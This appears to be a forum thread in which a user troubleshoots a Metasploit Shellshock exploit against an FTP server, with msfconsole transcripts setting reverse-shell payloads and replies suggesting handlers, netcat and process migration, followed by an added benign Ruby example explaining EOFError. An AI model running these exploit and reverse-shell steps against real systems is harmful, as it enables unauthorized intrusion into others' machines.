Shell And Meterpreter

January 1, 2016

Hello all, I have compromised a test setup with MSF. I can open a SHELL but am not able to open a meterpreter, anyone know what I am missing. I launched the exploit by hand, target was vulnerable and is compromised. Thanks

Did you set meterpreter as the payload? If so, what is the error?

I will copy the error as soon as I am back to work, at home I don't have access to the server.

In general to make this work:

- Make sure to generate a meterpreter payload (i.e. windows/meterpreter/reverse\_tcp for windows)
- Start a listener in msfconsole: exploit/multi/handler
- Set the same payload in the handler as in the exploit.
- Run the handler first, then fire the exploit.

Good luck.

Thanks, I forgot to run the handler before the exploit. Makes sense...

Cool that you got it working! :D

Now I get this strange error ..... Reason: Died from EOFError ..... H E L P please

```
msf exploit(pureftpd_bash_env_exec) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
msf exploit(pureftpd_bash_env_exec) > sessions

Active sessions
===============

  Id  Type   Information  Connection
  --  ----   -----------  ----------
  1   shell               ->

msf exploit(pureftpd_bash_env_exec) > sessions -i 1
[*] Starting interaction with 1...
[*] - Command shell session 1 closed. Reason: Died from EOFError
```

Can you post your Show options output? Redact any Internet-facing IPs, of course.

I can, I will rerun the procedure. The RHOST number above is of course not real, I replaced it with a fake one.

```
use exploit/multi/ftp/pureftpd_bash_env_exec
msf exploit(pureftpd_bash_env_exec) > set TARGET 1
TARGET => 1
msf exploit(pureftpd_bash_env_exec) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(pureftpd_bash_env_exec) > set LHOST
LHOST =>
```

This answer I found myself but it doesn't help me even a bit: EOFError (End of File error) is thrown when you are trying to carry out an operation on a file object that is already referencing the end of the file. In this example, we are trying to readline when the line doesn't exist.

```
msf exploit(pureftpd_bash_env_exec) > set LPORT 17149
LPORT => 17149
msf exploit(pureftpd_bash_env_exec) > set SSLVersion TLS1
SSLVersion => TLS1
msf exploit(pureftpd_bash_env_exec) > set RPORT 21
RPORT => 21
msf exploit(pureftpd_bash_env_exec) > set SSLVerifyMode PEER
SSLVerifyMode => PEER
msf exploit(pureftpd_bash_env_exec) > set VERBOSE 0
VERBOSE => 0
msf exploit(pureftpd_bash_env_exec) > set WfsDelay 0
WfsDelay => 0
msf exploit(pureftpd_bash_env_exec) > set SSL 0
SSL => 0
msf exploit(pureftpd_bash_env_exec) > set ConnectTimeout 10
ConnectTimeout => 10
msf exploit(pureftpd_bash_env_exec) > set TCP::send_delay 0
TCP::send_delay => 0
msf exploit(pureftpd_bash_env_exec) > set EnableContextEncoding 0
EnableContextEncoding => 0
msf exploit(pureftpd_bash_env_exec) > set FTPDEBUG 0
FTPDEBUG => 0
msf exploit(pureftpd_bash_env_exec) > set DisablePayloadHandler 0
DisablePayloadHandler => 0
msf exploit(pureftpd_bash_env_exec) > set FTPTimeout 16
FTPTimeout => 16
msf exploit(pureftpd_bash_env_exec) > set TCP::max_send_size 0
TCP::max_send_size => 0
msf exploit(pureftpd_bash_env_exec) > set RHOST
RHOST =>
msf exploit(pureftpd_bash_env_exec) > set CMDSTAGER::FLAVOR auto
CMDSTAGER::FLAVOR => auto
msf exploit(pureftpd_bash_env_exec) > set RPATH /bin
RPATH => /bin
msf exploit(pureftpd_bash_env_exec) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on
```

Nothing is obvious from your output. I haven't seen that error before but that doesn't mean much. : ) Are you sure the exploit is valid against that host? I would probably just enumerate more and try another attack vector. If there aren't any then I would probably go through the exploit code and see if I could do it by hand. That way you might be able to see why it is throwing an error and where.

Thanks for your response. The exploit is valid against the host, it opens a shell but only for 30 seconds. If I type the command to list the sessions I can see that a session is open. This wouldn't be the case if the target wasn't compromised. I haven't figured it out yet, but I will. I am going for the admin account. Thanks again

I found that some shells and some exploits don't really work well together. In your output above you use generic/shell\_reverse\_tcp. Maybe give linux/x86/shell\_reverse\_tcp a try instead. I've been more successful with that one...

Hi, You should upload an exe payload to the server and run it in order to open a more stable reverse shell. I got exactly the same problem with Brainpan 1 (on Vulnhub) last week. I've found the shell is more stable if I used a non-meterpreter reverse shell but a standard one.

Using an executable to set up a reverse meterpreter shell is not always an option... As an alternative, when using meterpreter you could try to do a migration to another process as well. That also often helps a lot. However, looking at the provided options Zjelco is not using Meterpreter, but a standard reverse shell: generic/shell\_reverse\_tcp.

Hmm, tough one. I am not sure what set FTPTimeout 16 is but you could play with that. You could tcpdump the entire exploit and see if there is anything obvious in the pcap. Any idea if the ftp server is dying? Have you looked if it has advanced options?

Hello guys, Uploading a file isn't an option yet. I do agree with the both of you and will try to use another, maybe more stable, reverse\_shell. Thanks, and I will keep you posted

Couple of years late, but have you tried setting the handler via netcat? Worked for me on a similar case and that solved it.
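An added example, not part of the original thread: Metasploit Framework is written in Ruby, and `EOFError` is what Ruby raises when a read reaches end-of-stream, which on a socket means the other end closed the connection. The sketch below uses a local `UNIXSocket.pair` as a constructed stand-in for a session socket (the function name `read_outcome` and its labels are assumptions made for illustration) to show how a peer that has exited differs from one that is merely idle.

```ruby
require 'socket'

# Read from one end of a local socket pair until the read loop ends, and
# classify why it ended. The block receives the "remote" end and plays the
# part of the process on the far side of a session (constructed stand-in).
def read_outcome(wait: 0.5)
  local, remote = UNIXSocket.pair
  yield remote
  data = +''
  loop do
    # Wait up to `wait` seconds for the socket to become readable.
    ready = IO.select([local], nil, nil, wait)
    return [:idle_but_open, data] unless ready
    # readpartial returns available bytes, or raises EOFError once the
    # peer has closed and nothing is left to read.
    data << local.readpartial(4096)
  end
rescue EOFError
  [:peer_closed, data]
ensure
  [local, remote].each { |s| s&.close }
end

if __FILE__ == $PROGRAM_NAME
  # Peer exits before sending anything: the first read fails with EOFError.
  p read_outcome { |r| r.close }
  # Peer answers once and then exits: data arrives, then EOFError.
  p read_outcome { |r| r.write("ok\n"); r.close }
  # Peer answers and stays alive: no EOFError, the reader just sees silence.
  p read_outcome { |r| r.write("ok\n") }
end
```

An EOF on the first read therefore points at the remote process having ended or the connection having been torn down, rather than at a slow or silent peer.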